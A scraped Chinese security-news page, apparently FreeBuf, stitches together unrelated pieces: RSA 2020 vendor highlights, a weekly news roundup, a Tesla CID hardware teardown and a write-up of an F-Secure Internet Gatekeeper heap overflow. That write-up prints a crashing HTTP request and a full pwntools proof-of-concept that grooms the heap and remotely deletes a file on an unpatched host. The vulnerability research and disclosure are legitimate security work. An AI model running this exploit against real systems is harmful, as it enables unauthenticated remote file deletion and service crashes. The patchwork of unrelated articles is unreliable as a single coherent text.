美国当地时间2月24日至2月28日,RSA 2020在旧金山 Moscone 中心举办。RSA 2020以“Human Elements”(即人的因素)为主题,聚焦与“人”相关的元素对网络安全产生的影响。

图片1_副本.png

今年大会因受到疫情影响,近20%的参展厂商在大会举办前取消了行程,嘶吼此前统计RSA 2020年共677家机构参展,作为最重要的年度网络安全盛会之一,每年举办大会意在使世界安全研究者走到一起,探讨行业发展的最新技术、策略和解决方案。为让RSA大会的信息安全关注者了解现场展会情况,嘶吼整理汇总了中国参展厂商亮点及国外企业更新产品目录(机构排名不分前后)。

绿盟科技

展区亮点:抗D、云DPS、新一代WAF、威胁情报

图片2.png

抗DDoS产品:自2002年发布上市以来不断更新,保持市场活力。防护能力贴合业务场景及技术演进方向,推出了威胁情报IP溯源、僵尸主机快速过滤、APP业务自动化定向防护、云地自动清洗互联等功能。在性能上,目前支持单体最大240G防护用于大型节点防护的建设。产品形态同时具备硬件和虚拟化两种可选,为与云计算、SDN等前沿方案的融合提供实现基础。此外,产品在方案可扩展性上不断延伸,将单一产品的DDoS检测与清洗能力与平台相结合,孵化出攻击溯源、DDoS运营增值、流量分析等多种方案。

国际云清洗中心:在2020年,绿盟抗D整合了云清洗和本地设备的能力,实现了智能切换流量路线的云地联动整体方案。云清洗处理超大流量攻击,本地设备处理复杂应用层攻击,并且流量线路可根据攻击情况自动切换,仅有在流量超出本地处理能力时,ADS才会发出云呼救信号,将流量牵引至云绿盟国际云清洗中心进行清洗,应对大流量攻击这是国内首次实现全自动云地清洗切换。

流量清洗业务运营系统ADBOS:基于抗DDoS产品设计的管理、运维及运营的综合平台。通过智能管理、多点拨测,流量调度等方式,使多节点的清洗和检测设备可以进行统一管理及资源调用。迅速准确地对各类DDoS攻击流量进行过滤。给客户提供调度、管理、增值运营等功能,在确保业务可用性的同时给客户带来收益。ADBOS良好的兼容性使得第三方厂家的抗DDoS设备也可以在平台上进行统一调度,统一管理,统一查看。

新一代WAF:绿盟科技新一代WAF可保护客户Web业务和API安全。通过基于机器学习的智能检测引擎和海量威胁情报赋能,让WAF的检测能力进一步提升,并保护客户免受未知风险。同时具备资产自学习、细粒度策略配置以及策略自优化的专家系统,使得扩容和运维更加轻松。

威胁情报:依托绿盟科技专业的安全团队和强大的安全研究能力,对全球网络安全威胁和态势进行持续观察和分析,以威胁情报的生产、运营、应用等能力及关键技术作为核心研究内容,推出了绿盟威胁情报平台以及一系列集成威胁情报的新一代安全产品,为用户提供可操作的情报数据、专业的情报服务和高效的威胁防护能力。

360集团

展区亮点: 360安全大脑

图片3_副本.png

360安全大脑:是360公司推出的实现网络安全防御智能升级的雷达系统。其基于大范围、长时间、多维度的安全大数据,综合运用大数据分析、机器学习以及人机结合等关键技术,发现高级网络攻击的蛛丝马迹并“看见”攻击行为的全貌,最终帮助国家和客户应对各种网络安全威胁。基于360安全大脑的云服务能力,360还为客户提供安全大脑本地化落地方案,包括安全运营中心、威胁情报中心、实战攻防靶场、漏洞管理平台、网络培训学院和其他安全服务。

保护智能驾驶时代的汽车网络安全:360汽车安全大脑。该方案包括加装终端防护软件、车载联网防火墙、汽车专用安全芯片等,不仅能对车联网状态进行实时的可视化呈现,还可以结合安全大数据,对各种安全事件进行告警、预测、处置和记录,同时进行取证、溯源、分析、复盘。360汽车安全大脑可从芯片到云端进行汽车全面防护,实现实时动态防御,减少残余风险,保证出行安全。

面向未来的家庭“安全+AI”大脑:基于强大的深度学习算法,通过场景规则引擎,将安防事件智能分级,自动筛选出需要关注的可疑内容的一套视频分析系统。360家庭安全大脑可将360智能家庭安防体系中的智能门锁、摄像头、可视门铃等硬件设备连为一体,实现对家庭内外进行全天候无死角的安全守护,也为用户提供更进一步的主动防御系统和一体化智能生活体验。

360BugCloud:国内首家开源漏洞响应平台,致力于维护开源通用软件安全,针对开源通用型高危漏洞进行安全研究及应急响应的组织与平台。据数据显示,平台仅上线第一周就收到来自全球超300个开源高危漏洞,漏洞涉及政府、企、事业等上百余家单位,覆盖能源、金融、交通、医疗、电信、教育众多关键行业领域,挽救了全球数亿的价值损失,共同维护了开源软件及社区平台的安全。

奇安信

展区亮点: 内生安全、威胁情报、天眼

图片4.png

内生安全:该理念认为,需要通过“一个中心、五张滤网”,真正将安全融入网络、应用、数据和行为,与业务相结合,形成关口前移。这样的安全体系可以在信息化环境内不断生长出安全能力,形成自主、自适应和自成长的安全体系,极大降低网络攻击的风险。这其中,当信息化系统和安全系统升级换代,业务系统流程再造的时候,安全能力应该能动态提升,它的核心是人的进步和成长。

而这与本届大会“人为要素”的主题极其契合,均为在信息系统的规划和开发阶段到整个运维阶段,将安全要素贯彻其中,牢记“人为错误是安全漏洞的主要原因”,减少系统本身安全问题带来的潜在风险。

在大会的第三天联合以色列著名的网络安全公司Cyberbit发布网络安全培训超现实仿真平台——奇安信应急演练网络靶场,深度结合了奇安信安全产品以及安全能力,融合了多年以来在国内多个行业重要基础设施攻防演练中的技术和经验,通过对各个行业典型业务场景的模拟仿真,提供多技能组合模式下的场景训练,完成多行业典型业务场景、重点安全事件场景下的攻防应急演习。

奇安信投资部总经理蔡欣华表示,

Cyber Range是目前全球首屈一指的网络安全培训超现实仿真平台。通过与奇安信的合作能够将产品进行本地化定制。目前,奇安信应急演练网络靶场是国内适配行业场景最多、应用场景最多的网络靶场,同时也是第一家主要专注于应急演练的网络靶场。

图片5_副本.png

其中,凭借卓越的网络安全技术和服务能力,奇安信天眼和安全服务分别获得了美国知名网络安全杂志CDM(Cyber Defense Magazine)颁发的两项大奖:天眼新一代威胁感知系统荣获“Next Gen”大奖,安全服务荣获“Most Innovative”大奖。而这些安全产品及场景解决方案的核心理念,即为奇安信去年创新性提出的“内生安全”。

图片6.png

山石网科

展区亮点:SD-WAN、智能矩阵

山石网科作为企业网络安全和风险管理解决方案的领先供应商,在本届RSA 2020大会上发布智能矩阵理念。今年RSAC将主题定位Human Element(人的因素),这正与山石网科最新的智能矩阵理念不谋而合——人工智能和人类智慧在智能矩阵中完美结合,带来1+1>2的安全性能,使得智能矩阵不断成长、不断进化,更好的捍卫企业网络的安全。

山石网科首席技术官兼联合创始人刘向明表示:

智能矩阵理念代表着山石网科将致力于让我们与客户成为一体,保护他们的企业网络免受越来越多高级威胁的攻击。有了山石网科的安全解决方案,我们的客户将强化他们的安全防御和保护。我们很高兴能与RSA的观众分享山石网科网络安全解决方案的最新发展。

图片8_副本_副本.png

数据分析引擎:自2013年推出第一款产品,经多年发展现在多款产品内均有集成。RSAC大会上主要展出的是内网安全的产品,以及T系列的智能下一代防火墙这两款产品。

云安全解决方案CloudHive:关于数据中心的防护,着重推出了在X系列的最新的平台,1TB的防火墙、X10800系统,以及在虚拟化安全、云安全的环境下,虚拟化或者云的环境下的安全解决方案,即CloudHive,一个创新的分布式安全的这么一个产品。

SD-WAN:新一代企业分支机构解决方案,一个非常前瞻的技术,山石网科在去年底发布了SD-WAN的产品和解决方案。

国外企业更新产品目录:

思科:发布SecureX,一种新的云原生安全平台,旨在提高安全可见性、交付分析能力、自动化安全工作流程等,将思科Talos团队对于威胁研究的能力智能、自动化的输出。

Fortinet:发布FortiAI,一种利用深度神经网络(DNN)加快威胁修复速度,并减少耗时的虚拟安全分析师。

Adaptiva:发布Endpoint Health,这是一种针对客户端和服务器的自动运行状况和补救解决方案。该产品可在几分钟内在整个企业内进行111次“健康检查”,并自动修复问题(包括缺少安全补丁和配置问题)。

Palo Alto Networks:推出 Cortex XSOAR,一个集威胁情报管理和SOAR一体的平台,用户可通过该平台自动化数百种网络安全用例,以协调第三方产品响应。

F5 Networks:重点介绍了其应用程序安全产品组合中的几个新解决方案。Essential App Protect可提供针对常见Web利用,恶意API和协同攻击的保护;行为应用保护是一种云交付解决方案,可通过实时检测恶意行为来保护应用安全。NGINX App Protect将F5 WAF技术引入NGINX,而Aspen Mesh Secure Ingress帮助保护进入Kubernetes集群的流量。

CyberArk:增强了端点特权管理器的功能,防止工作站和服务器上的凭证被盗,并帮助防御者快速检测并主动关闭正在进行中的攻击进程。

McAfee:宣布了扩展MVISION平台,并增加了保护整个生态系统中的企业数据的功能和保护本机应用程序的整个基础架构和应用程序堆栈的功能。还启动了一个全球托管检测和响应(MDR)平台,提供诸如威胁搜寻,取证和调查以及全天候端点威胁检测和响应服务。

Intel:发布四项新的安全功能:应用程序隔离、VM和容器隔离、全内存加密和Intel平台固件弹性提升,并提供了有关其先前宣布的“计算生命周期保障”供应链透明度计划的更多信息。

Gurucul:发布一个云原生数据驱动的平台,用于自动化安全控制。包括用户和实体行为分析(UEBA)、网络流量分析(NTA)、日志聚合、SIEM、SOAR和威胁搜寻。借助机器学习和人工智能,该平台可帮助组织从网络、IT系统、云平台、应用程序、IoT和更多内容中提取和分析数据,以实时检测威胁。

Secureworks: 推出了 Cloud Configuration Review,这是一种云配置评估解决方案,是和VMware合作建立一体化服务中的第一个产品。该平台提供公共云安全性和合规性监视功能,以帮助检测配置漏洞,了解关键风险的业务影响以解决与采用公共云带来的相关挑战。

Imperva:发布Advanced Bot Protection,它将对僵尸程序的管理方案集成到其云安全解决方案中。提供了对单一堆栈模型中的漫游器保护,以保护网站、移动应用程序和API免受自动化威胁。

Proofpoint:推出了通过利用公司的安全电子邮件网关、威胁防护和响应、电子邮件身份验证、意识培训和云帐户保护来保护组织免受BEC和EAC攻击的解决方案。以及CASB解决方案的改进等内容。

BlackBerry:发布CylanceOPTICS v2.4,增强Spark平台的EPP和EDR功能。更新后的解决方案旨在通过改进DNS可见性、Windows登录事件可见性、RFC1918地址空间可见性以及通过Windows API增强WMI和PowerShell来提供更快的事件响应。

Keysight Technologies:发布提高运营安全性的平台,包括威胁模拟器漏洞和攻击模拟解决方案,该解决方案使网络和DevSecOps团队能够通过模拟网络上的攻击,来衡量运营安全性的有效性。

图片9_副本.jpg

注:

1)以上产品国内发布及更新时间请参考官网

2)更新目录参考内容:SECURITYWEEK、企业官方网站及官方社交媒体账户

本周BUF大事件还是为大家带来了新鲜有趣的安全新闻,微盟员工删库跑路,公司市值暴跌10亿;迪卡侬数据库泄露了1.23亿员工的数据;RSAC 2020于旧金山举行,大会主题:Human Elements;FreeBuf发布《2020国内WAF产品研究报告》。想要了解详情,来看本周的BUF大事件吧!

观看视频

内容梗概

微盟员工删库跑路,公司市值暴跌10亿

2月23日晚,微盟公司的SaaS业务突然崩溃,基于微盟的商家小程序都处于宕机状态。随后微盟官方发布公告称:本次故障是由微盟核心运维人员的恶意破坏导致。受删库事件影响,微盟股价24日出现下跌,仅在这一天时间内,蒸发的市值超过10亿港元。2月27日,微盟创始人孙涛勇回应员工删库表:企业都有至暗时刻,不落井下石是道德。

v2-de4af43bc30c08123a71d03c4feeaed2_r_看图王.jpg

迪卡侬数据库泄露了1.23亿员工的数据

近期,体育连锁巨头迪卡侬发生大范围数据泄露,起因是1.23亿条记录被保存在一个并不安全的数据库中。泄露的数据涉及员工系统用户名、未加密的密码、API日志、API用户名、个人身份信息等。该数据库漏洞于2月12日被发现,迪卡侬于2月16日得到通知,随后数据库于2月17日下线。 

QQ图片20200227171445.jpg

RSAC 2020于旧金山举行,大会主题:Human Elements

美国时间2月24日-28日,RSA 2020在在旧金山拉开帷幕。今年大会以“Human Elements”为主题,聚焦与“人”相关的元素对网络安全产生的影响。作为网络安全行业风向标,从1991年至今,RSA大会已经走过29个年头。大会主题一年一变,从去年的“Better”变为“Human Element”,意味着人在未来安全行业发展中将发挥不可或缺的作用。想要了解更多大会详情,请关注FreeBuf RSAC 2020专题报道,图文直播带你亲临现场。。 

捕获34_看图王.png

FreeBuf发布《2020国内WAF产品研究报告》

近年来,针对Web应用的攻击已成为企业面临的主要安全问题之一,75%网络攻击都是发生在Web应用层。而WAF承担了抵御常见Web攻击的作用,是大多数互联网公司Web防御体系中最重要的一环。近期,FreeBuf发布了《2020国内WAF产品研究报告》,针对企业面临的Web安全问题、部署WAF的业务场景和使用现状加以分析,推出国内主流WAF产品名录,为企业选择WAF产品提供参考,扫描下方二维码即可下载完整版报告。 

QQ图片20200229024606_看图王.png

* 本文作者:willhuang,FreeBuf视频组荣誉出品,转载须注明来自FreeBuf.COM

F-Secure Internet Gatekeeper堆溢出漏洞介绍

在这篇文章中,我们将对F-Secure Internet Gatekeeper应用程序中的一个堆溢出漏洞进行解析,并介绍为何一个简单的错误就导致了一个可利用的未认证远程代码执行漏洞存在。

漏洞复现环境搭建

在我们的实验环境下,所有的漏洞复现与测试都在一台CentOS虚拟机中进行,虚拟机配置为至少1个处理器和4GB RAM。

接下来,下载F-Secure Internet Gatekeeper:【点我下载

但是现在,厂商已经下架了存在漏洞的产品。

受影响版本的产品包SHA256如下:

1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26

安装步骤:

1、如果你使用的是x64版本的CentOS,请运行下列命令:

yum install glibc.i686;

2、然后,运行下列命令安装F-Secure Internet Gatekeeper;

rpm -I <fsigkbin>.rpm

3、为了方便调试,请安装gdb 8+和gef【点我下载】。

现在,我们已经可以使用GHIDRA/IDA或者其他反汇编/反编译工具来对F-Secure Internet Gatekeeper进行逆向分析了。

漏洞分析

根据F-Secure提供的信息,F-Secure Internet Gatekeeper是一款“高效且易管理的企业网络网关级的安全防护解决方案”。

F-Secure Internet Gatekeeper包含一个运行在9012/tcp端口上的控制面板,该面板可以用来控制产品中所有可用的服务以及规则,例如HTTP代理和IMAP代理等等。这个控制面板可以通过HTTP协议访问,这个特性由采用C语言开发的fsikgwebui程序实现。实际上,整个Web服务端都采用了C/C++开发,其中也有部分组件使用了CivetWeb的代码,因此我们可以认为服务端很可能使用的是自定义版本的CivetWeb

由于服务端采用的是C/C++开发的,因此我们就可以尝试去寻找其中是否存在内存崩溃漏洞了,因为这种语言开发的应用程序经常会存在这种安全问题。

在这里,我们选择使用Fuzzotron来对管理员控制面板进行模糊测试。Fuzzotron是一款功能强大的模糊测试工具,它使用Radamsa作为底层引擎驱动,并且内置TCP支持,以便于对网络服务进行模糊测试。对于测试用例,我们选用了一个用于更改管理员控制面板语言设置的有效POST请求,而且未授权用户可以发起该请求,因此非常适合我们的测试场景。

在分析Radamsa经过变异处理的输入样例时,我们可以看到该漏洞与Content-Length Header有关。导致软件崩溃的测试用例Header值为:Content-Length: 21487483844,这表明溢出漏洞与整数计算错误有关。

在gdb中调试测试用例之后,我们发现导致崩溃的代码位于fs_httpd_civetweb_callback_begin_request函数中,这个函数主要负责处理入栈连接,并且根据HTTP请求类型、地址路径或Cookie来将请求转发给相关的函数进行下一步处理。

在漏洞的复现过程中,我们需要向管理员控制面板所使用的端口9012发送POST请求,我们在其中设置了一个非常大的Content-Length Header值:

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

目标应用程序会对该请求进行解析,并执行fs_httpd_get_header函数来获取Content-Length值。接下来,该字段值会被传递给strtoul函数(将字符串转换为无符号长整型)进行处理。

上述控制流对应的伪代码如下:

content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
   content_len_new = strtoul(content_len_old, 0, 10);
}

strtoul函数的返回值是一个无符号的长整型,它在32位系统上的最大值为2^32-1。

由于我们提供的Content-Length对无符号长整型来说太长了,因此strtoul函数会返回ULONG_MAX值(原始值发生溢出),那么在32位系统上对应的值就是0xFFFFFFFF。

当fs_httpd_civetweb_callback_begin_request函数尝试执行malloc请求来为数据分配空间时,首先会在Content_Length变量上加1,然后再调用malloc函数。

相应的伪代码如下:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

由于0xFFFFFFFF + 1后将导致整数溢出,最终得到的结果为0×00000000,从而导致malloc分配大小为0个字节的内存空间。

调用malloc(0)时,该函数会返回指向堆的一个有效指针,该指针指向的是最小的一个chunk(大小为0×10字节)。

进一步分析后,我们可以看到代码中还调用了mg_read函数:

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}

发生溢出后,上述代码会读取堆中任意数量的数据,并且没有任何约束,这就非常方便进行漏洞利用了。此时,我们可以停止向HTTP流写入数据,目标软件会直接关闭连接并继续执行操作流。这样一来,我们就可以完全控制需要写入的数据了。

漏洞利用PoC

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

漏洞修复

F-Secure针对该安全问题分配的编号为FSC-2019-3,目前F-Secure已在F-Secure Internet Gatekeeper的v5.40–5.50 hotfix 8 (2019-07-11)版本中修复了该漏洞。

参考资料

Linux堆溢出漏洞利用:

1、Linux Heap Exploitation Intro Series: Set you free() – part 1

2、Linux Heap Exploitation Intro Series: Set you free() – part 2

GLibC:

1、GLibC Malloc for Exploiters – YouTube

2、Understanding the GLibC Implementation – Part 1

3、Understanding the GLibC Implementation – Part 2

相关工具:

1、GEF:https://github.com/hugsy/gef

2、Villoc:https://github.com/wapiflapi/villoc

* 参考来源:doyensec,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

0x01 Tesla 硬件概述

和现代汽车一样,特斯拉的构造是通过CAN网关连接多个独立的CAN总线,网关的另一端有一台功能强大的嵌入式计算机,可以接入公网,可控制其所有组件的固件更新。

特斯拉的物理组成:

· CID(中央信息显示单元):仪表板中央的控制台

· IC(仪器集群)

· 常规CAN连接的ECU

0x02 组件概述

高度集成的CID包括:

image.png

大多数车辆是IVI(车载信息娱乐系统),CAN网关和TCU(电信控制单元)配备了单独的单元,但是Tesla将中央信息组合为一个单独的大型单元。在其他汽车上,IVI,CAN网关和TCU通常都是由不同的制造商生产的(例如Clarion IVI,Bosch网关和Ficosa TCU)。特斯拉集成了这些单元以实现完全控制,这也解释了为什么可以如此快速地进行更改。

CID和IC通过以太网和CAN总线连接。该IC唯一与安全相关的组件是另一个Nvidia VCM。这与CID中的不同,RAM减少了50%。CAN连接的ECU在车辆的其余部分更为通用,通常是带有集成闪存,运行裸机软件或RTOS(实时操作系统)的微控制器。它们是由多家制造商生产的,有些与其他车辆相似或相同,而其他一些(例如,Pektron生产的车身控制模块)则是定制的。

特斯拉中的CAN总线:image.png特斯拉还有许多LIN总线。

0x03 CID硬件架构

CID相当复杂。一个14层PCB结合了几个功能块。

这使得逆向变得非常棘手,尤其是因为缺乏公开信息,CID损坏就会导致车辆无法使用。

我们从特斯拉中取出了CID,以对其进行通电和检查。

image.png

image.png

0x04 可视计算模块

NVidia VCM(可视计算模块)位于CID的核心。这是运行Linux的基于ARM的计算机模块,该操作系统驱动Tesla的大多数可见动作。

image.png

CID和IC中都使用了Nvidia VCM模块。

奥迪,宝马和兰博基尼都与Nvidia VCM相关。例如,我们在奥迪虚拟座舱中发现了类似的模块。

image.png

image.png

VCM中使用了Nvidia Tegra片上系统(SoC)。它具有多核ARM处理器,GPU和其他各种音频和视频加速器。它比我挖掘过的其他IVI中使用的SoC强得多,这可能是由于CID显示屏很大。Tesla Autopilot(AP1和AP2)使用单板计算模块。这些与CID和IC中的VCM非常不同。该车辆没有特斯拉自动驾驶仪模块,因此我无法对其进行测试。在CID上的代码中,我都没有找到对自动驾驶仪的引用。

VCM没有公共数据表,这在汽车电子产品中很常见,并且使逆向非常困难。当只有一个单元可以测试时,尤其是如此,这意味着必须非常小心,不要损坏它。“ Jetson Pro开发套件”中使用了类似的VCM模块:

image.png

即使没有VCM或Tegra SoC的手册,开发板也经常包含所提供模块的原理图和引脚,以及破坏性测试的备件。这对于在Tesla中对VCM进行逆向很有帮助。不幸的是,Jetson Pro开发套件没有提供任何公共文档。尽管我尝试从eBay获得开发工具包,但是在编写此报告时没有可用的工具包。

但是,类似的开发板Jetson TK1也很容易获得。不使用VCM模块,而是直接将其他Tegra SoC安装到PCB。有关此文档的信息仅提供了有关Tegra SoC的少量信息。可以获取有关Tegra 2、3和4 SoC系列的技术参考手册,但是它们不包含引脚图,因此在逆向中用途有限。

为了访问文档和论坛,我在Nvidia.com创建了一个有效的开发人员帐户,但是我只能找到VCM或Jetson Pro开发套件的参考。我写了一个论坛帖子,询问有关文档的信息,但没有得到回应。我设想必须签署NDA才能访问重要的内容,但我不太可能与第三方共享任何信息。

VCM上的连接器就像MXM,用于笔记本电脑的某些图形模块,这些模块具有标准化的引脚排列。但是,这些模块的引脚排列与VCM不同。我研究了其他基于Tegra的单板计算机模块,但没有发现任何相似之处。使用了不同的连接器,外部存储器和外围设备。我没有发现任何有意义的东西。几则新闻报道(包括https://electrek.co/2017/09/26/tesla-intel-power-infotainment-system/)报告说,特斯拉正在将基于Nvidia的平台更改为英特尔。这个新板子叫做“戈登湖”,看上去很像Nvidia VCM:

image.png

连接器是相同的,而安装布置看起来却有所不同,尤其是在使用散热器板时。和以前一样,如果不输入NDA,将无法获得数据表。

为了进一步进行逆向,我从CID和IC中取出了VCM进行检查:

image.png

这些是在CID的VCM上看到的主要组件:

image.png

IC中的VCM非常相似:image.png

两个VCM的引脚输出是相同的,电源和接地在相同的引脚上,已由示波器确认。不希望从特斯拉直接测试VCM,因为存在损坏CID或IC或使之积压的风险。这可能会使汽车无法使用,并需要花费3,000到10,000英镑在特斯拉进行维修。

为此,我从二手IC获得了第三个VCM。该测试与测试中IC中的VCM相同,但RAM减少了50%。IC本身是不同的型号。我进行了安全测试:

image.png

从逆向中获得的信息不多。

第1阶段和第2阶段的引导程序,内核以及其他与引导相关的数据包含在64MB NOR闪存中,并且其中的大多数数据都通过主要/恢复机制进行备份,以允许设备引导至恢复模式。

文件系统的其余部分位于8GiByte NAND闪存中。大多数文件存储在压缩的只读文件系统(squashfs)中,一小部分存储在读/写文件系统(ext4)中。这很常见,并且(大多数)不可更改的文件(例如系统二进制文件)占用少量闪存,而设置和日志的存储未压缩。

0x05 以太网交换机

内置的以太网交换机通过Marvell 88E6061将VCM连接到车辆的其余部分,此五端口10/100交换机支持VLAN。使用串行接口SMI进行配置。CID启动时,将配置以太网交换机。逻辑分析仪可以嗅探SMI命令。我无法确定它们是由VCM还是由网关处理器发送的,使用多个VLAN将流量与各个组件隔离开来。

SMI没有安全功能,例如完整性保护,它信任所有信号,这意味着可以篡改或修改通信。可以以这种方式修改VLAN配置,从而有可能在系统中创建新路由。交换机旁边是5个LED,指示以太网端口上的链接/流量,LQFP包装可轻松访问信号。

0x06 网关

使用飞思卡尔SPC5668GVMG,这是一个基于PowerPC的微控制器,具有2MB闪存和512KB RAM,完整的数据表可用。

image.png

具有CAN收发器的网关。在CAN网关中经常发现类似的设备,网关连接到CAN总线和以太网交换机,关上的固件是FreeRTOS,这是一种轻量级的实时操作系统(RTOS),可用于多种汽车用途。

0x07 蜂窝调制解调器

Sierra AirPrime AR8552是常见选择。它安装在子板上,紧邻GPS接收器模块,ublox LEA-6R-0-002和加速度计:

image.png

在内部,AR8552使用Qualcomm MDM6200 SoC。这些通常运行一个称为Legato的嵌入式Linux发行版。USB用于蜂窝调制解调器和VCM相互通信。

VCM不包含SIM卡,这与以前记录的美国Tesla调制解调器不同。而是将其安装在远程吊舱中,并通过线路将其连接到CID,因此可以在不删除CID的情况下访问和更改SIM卡。这可能是由于欧盟竞争法所致,以确保特斯拉可以使用多个移动网络:

image.png

在这种情况下,SIM卡是O2。我无法确定SIM卡是否随车辆一起提供或是否已被更换,SIM卡没有感兴趣的数据,例如SMS消息。调制解调器与EE SIM可以配合使用。

车辆中的大多数TCU不允许用户访问和可交换的SIM卡。嵌入式或不可访问的SIMS正在成为常态。尽管对特斯拉进行了进一步检查,但我并未发现在CID的VCM上运行的任何跟踪或eCall功能。表明这些安全保护功能按照其他车辆中的TCU直接在蜂窝调制解调器上运行。

要从Sierra Wireless AR8522模块中恢复固件而不造成损坏是非常困难的,因为它是一个紧密包装的BGA模块,其中包含许多BGA芯片,所有这些芯片都包含在焊接屏蔽下。

0x08 Wi-Fi模块

CID采用面朝下安装的Parrot Wi-Fi和蓝牙模块。我们无法确认具体型号,因为无法将其从主板上卸载,之前拆卸的CID显示了Parrot FC6050W,VCM和Parrot模块通过USB进行通信。

0x09 SD存储卡

CID主板的顶部是两个插槽式SD卡。CID顶部的插槽允许访问连接到VCM并具有映射数据的16GB microSD卡:

image.png

必须分离CID才能访问4GB的普通SD卡。它连接到网关,并在固件更新期间用于暂存文件,在逆向过程中,它们都扩展到了CID之外,以便在汽车行驶时可以轻松访问它们。

image.png

两张卡都没有看到完整性保护或加密。

0x10 其他组件

CID上与安全性不太相关的其他组件:

· ADI公司的ADSP-21489 DSP芯片,可能用于音频播放和录制。LQFP封装连接到外部串行闪存芯片

· Altera Cyclone IV EP4CE40F23A7N FPGA已连接到两个ISSI RAM芯片和一个用于bitteam的串行闪存芯片(本质上是FPGA固件)。这可能允许VCM与用于显示显示器和触摸面板进行接口。

0x11 外置USB

CID的背面有两个USB端口,既接受媒体设备,又在UI中显示它们。我尝试了USB外设,即以太网适配器和键盘:

· 与基于Linux的IVI一样,USB以太网适配器可以枚举,但没有起作用。我看不到任何TCP / IP通信。

· 枚举的键盘不起作用

0x12 内部USB

CID主板上只有一个USB端口连接到VCM。之前的研究(https://blog.lookout.com/hacking-a-tesla)发现,此漏洞可用于访问Tegra恢复模式(RCM),它不能被禁用。仍然受到安全保护,这意味着必须在接受命令之前对其进行签名。

引信Gelée漏洞是在RCM bootloader的恶意USB数据包可以绕过安全检测,我与发现此漏洞的研究人员确认,该漏洞很可能存在于Tesla中VCM使用的早期Tegra SoC上。由于存在使VCM无法操作的风险,我决定不尝试利用此漏洞。

0x13 以太网端口

在CID上,使用专用的汽车连接器公开了两个以太网端口。以前是完全打开的,一个是专用的诊断连接,现在,这是通过专有的handler来保护的,并且没有已知的漏洞。特斯拉服务器通过VPN连接向CID发送“seed”。

CID和IC通过另一个以太网连接器链接。以太网交换机可以拦截该流量并嗅探流量,该区域中的所有漏洞现已被修复。在特斯拉汽车具有自动驾驶仪的地方,诊断以太网连接器被重新调整了用途,并具有诊断端口。

0x14 常规诊断连接器

还有两个以上的常规诊断连接器。OBD-II端口可访问CAN总线1和6,有一个特殊的诊断端口,可访问CAN总线2、3、4和6,以及K-Line总线专门用于HVAC。没有观察到隔离或访问控制的迹象,如果有人可以访问此端口,他们可以嗅探并发送任意CAN流量。

0x15 JTAG串口

各种嵌入式设备都可以恢复固件,并受到调试协议JTAG的攻击。JTAG功能存在于CID和IC的多个设备中。在物理JTAG连接方面,CID和IC主板上都安装了多个10pin接头连接器,它们可能是JTAG连接,因为它们都在微控制器或存储设备附近:

有几种方法可以确定引脚排列:

1. 爆破测试JTAG(“ JTAGulating”),可能产生误报并损坏电路板。

2. 如果可以访问引脚并且提供数据手册,则对其中一个器件上已知JTAG引脚的连续性测试是安全的。

唯一具有可访问引脚和JTAG的封装是Analog Device ADSP-21489,其余均为BGA。可以确定JTAG连接器的引脚排列,因为可以使用数据表和引脚排列。我订购了特定类型的连接器,制作了线路,并使用了各种JTAG适配器和逻辑分析仪来确定是否已启用安全措施。

我尝试了JTAG命令,但CID和IC上的VCM没有响应,我认为由于SoC保险丝熔断,很可能会阻止访问。使用MPC56xx系列提供的“检查”功能,JTAG ID会引起网关处理器的响应。使用64位密码保护,我尝试使用默认值FEEDFACECAFEBEEF也失败了,可以使用其他方法获得固件。

JTAG ID引起了ADSP-21489的响应,但似乎正在使用64位密码保护。此专有保护方案需要特定的JTAG适配器,这将花费约1200英镑,并且可能仅确认无法访问,我认为不太可能造成任何直接的安全风险。

JTAG Secure禁止访问Altera Cyclone IV FPGA,没有已知的安全问题。我没有对Parrot Wi-Fi板进行检查,因为没有可用的数据表,并且对安全性的影响很小,很高兴看到所有JTAG访问均已关闭,因为许多其他系统都是允许访问的。